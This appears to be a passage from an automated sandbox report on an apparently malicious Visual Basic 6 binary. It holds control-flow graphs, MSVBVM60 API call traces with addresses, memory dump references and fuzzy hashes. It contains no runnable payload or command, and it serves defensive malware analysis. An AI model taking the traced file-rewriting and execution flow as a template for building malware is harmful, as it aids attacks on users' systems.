411b70-411bc3 #525 __vbaStrMove __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 383->385 384->374 385->384
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,00409C6C,00000000,00000000), ref: 004115AE
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004115DB
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004115E7
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004115F3
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00411602
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00411621
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00411630
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 00411644
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00411652
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411662
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 00411669
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 00411676
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 004116AD
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 004116B4
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004116BF
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004116CF
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 004116DA
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004116EA
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004116F7
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0041170C
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00411720
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                              • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00411735
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000), ref: 0041173C
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0041175E
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,00000000,004025E6), ref: 0041178B
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000,?,?,00000000,004025E6), ref: 00411792
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004117A9
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 004117B0
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004117DB
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(?,00000000), ref: 004117E6
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004117F6
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000004,?,00000000), ref: 00411803
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411832
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000001,00000000), ref: 0041183B
                                                                                                                                                              • Part of subcall function 0040FBA0: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,00000000,?,00000000,004025E6), ref: 0040FBBE
                                                                                                                                                              • Part of subcall function 0040FBA0: __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6,?), ref: 0040FBEE
                                                                                                                                                              • Part of subcall function 0040FBA0: #580.MSVBVM60(00000000,00000000,00000000,?,00000000,?,00000000,004025E6,?), ref: 0040FC1A
                                                                                                                                                              • Part of subcall function 0040FBA0: #529.MSVBVM60(00004008), ref: 0040FC38
                                                                                                                                                            • #648.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041186A
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411879
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041188D
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041189B
                                                                                                                                                            • #525.MSVBVM60(00001000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004118AD
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004118B8
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411911
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041191E
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041192E
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041193B
                                                                                                                                                            • #525.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411979
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411984
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411994
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119A1
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119B1
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119BE
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119E0
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119E7
                                                                                                                                                            • #648.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A16
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A25
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A39
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A47
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A57
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A5E
                                                                                                                                                            • #580.MSVBVM60(?,00000026,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A71
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A85
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A93
                                                                                                                                                            • #525.MSVBVM60(00001000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411AA5
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411AB0
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B09
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B16
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B26
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B33
                                                                                                                                                            • #525.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B71
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B7C
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B8C
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B99
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BA9
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BB6
                                                                                                                                                            • #598.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BD0
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BE5
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BEC
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BFC
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C03
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00406BF8,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C19
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C24
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C31
                                                                                                                                                            • #600.MSVBVM60(00000008,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C47
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C56
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C5F
                                                                                                                                                            • #600.MSVBVM60(00004008,00000000), ref: 00411C85
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00411CE8), ref: 00411CBD
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000000,004025E6), ref: 00411CC6
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000000,004025E6), ref: 00411CCF
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000000,004025E6), ref: 00411CD8
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000000,004025E6), ref: 00411CE1
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 00411CFF
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$FileMove$CloseGet3$#525$CopyOpenPut3$#516#631#648BstrErrorSeek$#580#600Chkstk$#529#537#570#598ListOverflow
                                                                                                                                                            • String ID: E
                                                                                                                                                            • API String ID: 1020712489-3568589458
                                                                                                                                                            • Opcode ID: dd04ee743c3aedb4f20eed2c2bd3a439915ce7c229051d87dfabd16d575bf736
                                                                                                                                                            • Instruction ID: 2c3bdc2995cc32bb6ddafcd024d806e85dbf0c974109c8e670926915eacf5b68
                                                                                                                                                            • Opcode Fuzzy Hash: dd04ee743c3aedb4f20eed2c2bd3a439915ce7c229051d87dfabd16d575bf736
                                                                                                                                                            • Instruction Fuzzy Hash: 8322E6B1900249EBDB04DFE0DA48ADEBBB5FF48305F108129E602B76A0DB745A85DB58
                                                                                                                                                            Function 00408D7C Relevance: 129.9, APIs: 73, Strings: 1, Instructions: 397COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 386 408d7c-408d87 387 40abac-40ac9b __vbaErrorOverflow __vbaChkstk __vbaOnError call 418c90 * 2 386->387 388 408d8d-408d9c 386->388 391 408da2-409172 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 410180 __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 410180 __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 410180 __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 410180 388->391 392 4091be-4091da __vbaStrCmp 388->392 439 409177-4091b9 __vbaFreeStrList 391->439 395 4091e0-409209 call 4125a0 392->395 396 40948c-4094a8 __vbaStrCmp 392->396 411 40924b-409296 __vbaStrCat #600 __vbaFreeVar 395->411 412 40920b-409245 call 40fba0 call 415660 #580 395->412 399 409b34-409c67 __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy call 40ee70 __vbaStrMove * 3 #690 __vbaFreeStrList #537 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 411590 396->399 400 4094ae-4094c7 call 4125a0 396->400 435 409c6c-409c97 __vbaFreeStrList 399->435 417 409509-409582 __vbaStrCat #600 __vbaFreeVar __vbaNew __vbaObjSet 400->417 418 4094c9-409503 call 40fba0 call 415660 #580 400->418 413 409298-4092a4 call 404c14 __vbaSetSystemError 411->413 414 4092aa-40933d __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaObjSet 411->414 412->411 413->414 455 409362 414->455 456 40933f-409360 __vbaHresultCheckObj 414->456 436 409584-4095a5 __vbaHresultCheckObj 417->436 437 4095a7 417->437 418->417 441 409c99-409ca6 __vbaEnd 435->441 442 409cab-409cc4 call 4125a0 435->442 443 4095b1-409646 __vbaFreeObj __vbaStrCopy call 410fb0 __vbaStrMove call 40ee70 __vbaStrMove __vbaInStr __vbaFreeStrList 436->443 437->443 446 409dec-409ee3 __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy call 40ee70 __vbaStrMove * 3 #690 __vbaFreeStrList #600 __vbaEnd 441->446 442->446 453 409cca-409ce4 #535 442->453 474 4097e2-409858 __vbaStrCopy call 410fb0 __vbaStrMove call 40ee70 __vbaStrMove __vbaInStr __vbaFreeStrList 443->474 475 40964c-4097dd __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove #611 #661 #705 __vbaStrMove * 3 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat #600 __vbaFreeStrList __vbaFreeVarList 443->475 467 409ee9-40a26c __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 418c90 __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 418c90 __vbaFreeStrList call 418a10 * 2 __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList 446->467 459 40aba7 453->459 460 409cea-409db1 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 410180 __vbaFreeStrList call 40fba0 #598 call 415660 453->460 457 40936c-4093ff __vbaFreeObj __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 410780 __vbaFreeStrList 455->457 456->457 470 409405-409481 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat #600 __vbaFreeStrList __vbaFreeVar 457->470 471 409487 457->471 459->459 490 409db3 460->490 491 409db5-409dd0 #535 __vbaFpR4 460->491 530 40a272-40a2b9 __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 467->530 531 40aa5b-40aa71 call 40f1d0 467->531 470->471 471->467 493 409aad-409af7 __vbaObjSet 474->493 494 40985e-40986c 474->494 475->493 496 409dd6-409de6 #580 490->496 491->460 491->496 508 409af9-409b1a __vbaHresultCheckObj 493->508 509 409b1c 493->509 497 40988a 494->497 498 40986e-409888 __vbaNew2 494->498 496->446 501 409894-4098c7 497->501 498->501 510 4098c9-4098ea __vbaHresultCheckObj 501->510 511 4098ec 501->511 513 409b26-409b2f __vbaFreeObj 508->513 509->513 514 4098f6-409924 510->514 511->514 513->467 519 409926-409947 __vbaHresultCheckObj 514->519 520 409949 514->520 521 409953-409aaa #611 #661 #705 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove * 2 __vbaStrCat __vbaStrMove __vbaStrCat #600 __vbaFreeStrList __vbaFreeObj __vbaFreeVarList 519->521 520->521 521->493 536 40a329-40a370 __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 530->536 537 40a2bb-40a323 __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 530->537 538 40aa73-40aa7a call 40f1a0 531->538 539 40aa7f-40aac9 __vbaObjSet 531->539 544 40a3e0-40a427 __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 536->544 545 40a372-40a3da __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 536->545 537->536 538->539 548 40aacb-40aaec __vbaHresultCheckObj 539->548 549 40aaee 539->549 552 40a497-40a4de __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 544->552 553 40a429-40a491 __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 544->553 545->544 551 40aaf8-40ab84 __vbaFreeObj __vbaFreeStr * 2 548->551 549->551 557 40a4e0-40a548 __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 552->557 558 40a54e-40a595 __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 552->558 553->552 557->558 561 40a605-40a64c __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 558->561 562 40a597-40a5ff __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 558->562 565 40a6bc-40a703 __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 561->565 566 40a64e-40a6b6 __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 561->566 562->561 569 40a773-40a7ba __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 565->569 570 40a705-40a76d __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 565->570 566->565 573 40a82a-40a871 __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 569->573 574 40a7bc-40a824 __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 569->574 570->569 577 40a8e1-40a928 __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 573->577 578 40a873-40a8db __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 573->578 574->573 581 40a998-40a9df __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 577->581 582 40a92a-40a992 __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 577->582 578->577 585 40a9e1-40aa49 __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 581->585 586 40aa4f-40aa56 581->586 582->581 585->586
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00408DB5
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408DC0
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408DCE
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408DD9
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408DE5
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408DF0
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408DFD
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E08
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408E16
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E21
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408E2D
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E38
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408E46
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E51
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408E5E
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E69
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408E75
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E80
                                                                                                                                                              • Part of subcall function 00410180: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00409D5A,00000000), ref: 0041019E
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004101CE
                                                                                                                                                              • Part of subcall function 00410180: __vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,00000000,004025E6), ref: 004101DF
                                                                                                                                                              • Part of subcall function 00410180: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004101EE
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,00000000,004025E6), ref: 0041020A
                                                                                                                                                              • Part of subcall function 00410180: __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 00410244
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041025A
                                                                                                                                                              • Part of subcall function 00410180: __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 00410273
                                                                                                                                                              • Part of subcall function 00410180: #525.MSVBVM60(00000104), ref: 0041029C
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrMove.MSVBVM60 ref: 004102A7
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 004102DE
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 00410338
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,?,?,?,?,?,?,00000000), ref: 00408EB2
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00408ECE
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408ED9
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408EE7
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408EF2
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408EFE
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F09
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F16
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F21
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F2F
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F3A
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408F46
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F51
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F5F
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F6A
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F77
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F82
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408F8E
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F99
                                                                                                                                                              • Part of subcall function 00410180: __vbaGenerateBoundsError.MSVBVM60 ref: 0041031D
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041035E
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041036F
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(?,00000000), ref: 00410384
                                                                                                                                                              • Part of subcall function 00410180: #616.MSVBVM60(?,?,?,00000000), ref: 00410399
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 004103A7
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004103BE
